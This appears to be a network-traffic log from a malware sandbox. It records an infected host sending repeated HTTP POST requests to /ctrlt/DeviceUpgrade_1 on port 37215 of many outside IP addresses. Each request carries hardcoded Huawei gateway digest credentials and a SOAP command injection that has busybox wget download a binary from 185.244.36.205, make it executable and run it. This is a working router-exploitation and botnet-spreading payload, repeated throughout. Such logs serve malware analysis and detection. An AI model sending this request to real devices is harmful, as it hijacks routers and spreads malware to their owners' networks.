                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              135192.168.2.1536424122.53.129.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035798073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              136192.168.2.1557632186.172.167.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035803080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              137192.168.2.1540410138.26.202.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035823107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              138192.168.2.1549298161.206.137.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035909891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              139192.168.2.1542094222.32.90.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035912037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              140192.168.2.1550782190.161.193.8437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035928011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              141192.168.2.1536230157.17.156.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035929918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              142192.168.2.1551348102.179.122.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035929918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              143192.168.2.153957894.166.37.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035998106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              144192.168.2.1556434190.144.145.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036066055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
